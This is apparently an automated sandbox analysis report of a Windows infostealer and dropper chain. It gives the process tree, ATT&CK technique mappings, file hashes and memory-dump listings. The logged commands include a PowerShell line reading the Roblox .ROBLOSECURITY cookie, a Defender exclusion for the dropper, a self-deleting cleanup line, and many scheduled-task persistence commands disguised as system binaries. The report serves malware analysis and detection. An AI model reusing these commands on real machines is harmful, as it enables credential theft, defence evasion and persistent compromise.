    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:700
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1224
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2764
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1208
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Saransk.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1692
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Users\Admin\AppData\Local\Temp\Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:352
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Chainnet\8f9Z3.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Chainnet\oniRrs8nIuzVsaH8sYiTK.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Chainnet\hyperInto.exe
        
        "C:\Chainnet\hyperInto.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2260
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Un8ljMOKnq.bat"
        6⤵
        
        PID:1616
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1460
        
        C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe
        
        "C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe"
        7⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        System policy modification
        
        PID:2100
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bc6985d8-5b81-4c35-9953-5623d5650274.vbs"
        8⤵
        
        PID:1368
        
        C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe
        
        C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe
        9⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        System policy modification
        
        PID:2344
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3d243bc6-b936-46f8-b71b-ba1d4bf0d002.vbs"
        10⤵
        
        PID:1960
        
        C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe
        
        C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe
        11⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        System policy modification
        
        PID:292
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e7f749a-643d-4b08-9e02-f3babce4dd93.vbs"
        12⤵
        
        PID:2508
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8e0d9b5-6c4e-40bd-8c6e-5e1f0b3fd937.vbs"
        12⤵
        
        PID:2792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b807140-7925-44d7-a29a-337e3ad5a13d.vbs"
        10⤵
        
        PID:636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0e03282a-3b39-4aec-afa9-76a967c7a3b8.vbs"
        8⤵
        
        PID:1848
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Chainnet\file.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\ModemLogs\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\ModemLogs\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\ModemLogs\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Users\Default\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Users\Default\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 10 /tr "'C:\Windows\Logs\HomeGroup\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\Logs\HomeGroup\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\HomeGroup\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Java\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\it-IT\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\it-IT\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\TableTextService\it-IT\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SaranskS" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\Saransk.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Saransk" /sc ONLOGON /tr "'C:\Windows\es-ES\Saransk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SaranskS" /sc MINUTE /mo 6 /tr "'C:\Windows\es-ES\Saransk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\it-IT\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\it-IT\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Windows\TAPI\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\TAPI\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SaranskS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\Saransk.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Saransk" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Saransk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SaranskS" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Adobe\Saransk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Chainnet\8f9Z3.vbe

Filesize
206B

MD5
b3080903ab3740f3f1346f2f61834c2b

SHA1
a5b37c9ea7a58c9194de44382d75dc4863d3d5b7

SHA256
505642ffc3c57426bb6575eb3ac48ea1f3e303fa5b34ea6ccd3fe2f7021619a1

SHA512
a33ace44bf4936bb2747586d590d762da473840179d9553d0b213f12f11a2d10713fb6bb5637058a40bf0b12f710dfe07930476d8ea5765f0dba816389f9e419

Download Submit
C:\Chainnet\file.vbs

Filesize
34B

MD5
677cc4360477c72cb0ce00406a949c61

SHA1
b679e8c3427f6c5fc47c8ac46cd0e56c9424de05

SHA256
f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b

SHA512
7cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a

Download Submit
C:\Chainnet\oniRrs8nIuzVsaH8sYiTK.bat

Filesize
27B

MD5
94db4d897ca54289c945a06574084128

SHA1
d4168950c994dacea1402a9570a4735350b86c10

SHA256
a759a78b129faaa486102e6486d595070e7c923bf4159ae7b8eb78fec3c2a461

SHA512
2548059003c4bff60dbe0e9aa5c097bac130ecb7bae7896b83f577bb2aa0e3c1b356545ebc92e3487ef937026c96ef48d2df750b31f0acea9166bfb9342cd28a

Download Submit
C:\Users\Admin\AppData\Local\Temp\0e03282a-3b39-4aec-afa9-76a967c7a3b8.vbs

Filesize
512B

MD5
dc992e645b3bbca2dce3fbbd5c64e5c5

SHA1
643332f40929a8ef7100f027016fe81157e3e916

SHA256
173250c2165863bbaeeec08bf15c3f54b81ccc5a78462d37fdc158e7eef9b102

SHA512
6cd00251580363b66c87f6ea760b438943a083765583e3583851808a520fd9925b8f23af00adf6470411a48322908615e590eff6a9279e969c322e977e2d0d0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3d243bc6-b936-46f8-b71b-ba1d4bf0d002.vbs

Filesize
736B

MD5
38d7530f39e7bda97eb4f14a4b71e850

SHA1
c09fc95e87637e540567cb0c2947d13eb4023c5b

SHA256
6ef663d000519196085ca3db5fa3f3a8edda826a7f97e8df91ae07bf6e4e4bd6

SHA512
b9f908bfce95e87ed428c61d859d3b4aaa501394c3f84e826e810a60f92599a9aa297d5475458bb19154ff73842fca6fb5eef9deceeeee004555dff1a5afc6a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\6e7f749a-643d-4b08-9e02-f3babce4dd93.vbs

Filesize
735B

MD5
a762ee98ad887ee6f1401f99d4134333

SHA1
ac89e66614e320898a49da75d2a5b4690ecb4e6f

SHA256
acd74a76abdf4b216b95bf293cf721121f0a596d64d79426f9938f7bd80fe1ac

SHA512
1829ffac27b53a309657fe5010209938ff334a4ea55f54726e4ce31319fdb4e29c078b20db76f4effbff3053b77a3d8384b111ccef16c1f94c3187d2da58e2be

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
3.7MB

MD5
323e22b442e4d4f9930c5b65f6d1028c

SHA1
7dadf78756dd00c68d5094a59dc7bcccf3c8346d

SHA256
eaedca12a90cf9afa1d7e42358571269e726ccd5a5c96b6d98c7b242f08e9e00

SHA512
2da37cfe8005ed1e299ad6c3e676abeafd6160b47bb9888d1cbdcb7a82e7955feedb4286ee6dfbe64a1b62814ff1af11a718074854d2699a4a2975d4fbfd5b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Saransk.exe

Filesize
227KB

MD5
05c183f8c0d871d6081f1ea4096805e4

SHA1
4a05aba815c8471fca4fcc9a789683385b0c24ca

SHA256
eff59569967501a5e21ff3f8be9cc487e30d23e1538aeb121f9ab0955c308849

SHA512
ef35359087662c4213f667c49182ab794fbb28dfe2a5b9e1fad5729e516b1ef08c2d7230a84e4808b693832d7b4ad43530377886cd2c993407a7fe38333ad347

Download Submit
C:\Users\Admin\AppData\Local\Temp\Un8ljMOKnq.bat

Filesize
225B

MD5
f404dbe1e5801f0b22a27b33d47afce1

SHA1
663ab97834f3294177ba9865d0e0bdd68003b835

SHA256
1b9e6eb83b7e618fc748d187e8524a51a90d86f1f0f14712abed8014b6598be3

SHA512
7ef57598004ea89478eba8ae698658b6a27becbb016d46b38fba24a54d3e463e1494169eacf062c4f813d46df3eb73a691af2ad480489ae3c80f7917e2712d9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bc6985d8-5b81-4c35-9953-5623d5650274.vbs

Filesize
736B

MD5
0a9ba92349500f94e30bf8aa1d220bc4

SHA1
3d3174b31f9ec6336e1dd33b643012dde4ff844e

SHA256
2bd2181637900c33fe6d5cfff95d96769342e4ced1163021a4a631d4e6717d08

SHA512
09c963dafd3aef17f0bec8e92ea962c2a160efb4a1a650603783d883a128c26be6e82e64f8272d999ea602c30131049e36d8e31200bc532e560251fb6bc40a1a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b04b575902ee2e728caae4c1232da665

SHA1
7234c58ad01837f762dc4c874d6980e4fbdf7fe6

SHA256
a7ec653754811996405d5c955b8c32f54e7d8261dc80b08155c2274f6b2b1c3e

SHA512
5feb99aa1d5a5a8ef4f60dcec9e621671be9cd7ecee2b7f99335a0aac8f87b7efbdd558ea61942773050df2eca8307d52e595ee43c1ae2c279d048005dac9753

Download Submit
\Chainnet\hyperInto.exe

Filesize
3.4MB

MD5
d63861446161da73423a6378ab06af5e

SHA1
8d3116fa2ac5d4e7fb9684498f69edf3e976f977

SHA256
c46e261e262516989fb8205f6e939b13fc19326f936229f024b41b9d4956f8bd

SHA512
7bf3f16a5c455dbf902284ba581097b7ecdefcfb9df55053c868f4ae84e9097b4fb6214c9896cc344ea65979516b20df8e35d19c97de79d52ee27fb86e61eb88

Download Submit
memory/292-202-0x0000000000D40000-0x00000000010AA000-memory.dmp

Filesize
3.4MB

Download
memory/292-203-0x0000000000CF0000-0x0000000000D46000-memory.dmp

Filesize
344KB

Download
memory/1612-50-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/1612-49-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2100-177-0x0000000000160000-0x00000000004CA000-memory.dmp

Filesize
3.4MB

Download
memory/2100-178-0x0000000002480000-0x0000000002492000-memory.dmp

Filesize
72KB

Download
memory/2260-114-0x000000001B0A0000-0x000000001B0A8000-memory.dmp

Filesize
32KB

Download
memory/2260-108-0x000000001B000000-0x000000001B00C000-memory.dmp

Filesize
48KB

Download
memory/2260-85-0x0000000000E30000-0x000000000119A000-memory.dmp

Filesize
3.4MB

Download
memory/2260-86-0x0000000000330000-0x000000000033E000-memory.dmp

Filesize
56KB

Download
memory/2260-87-0x0000000000560000-0x000000000056E000-memory.dmp

Filesize
56KB

Download
memory/2260-89-0x0000000000580000-0x000000000059C000-memory.dmp

Filesize
112KB

Download
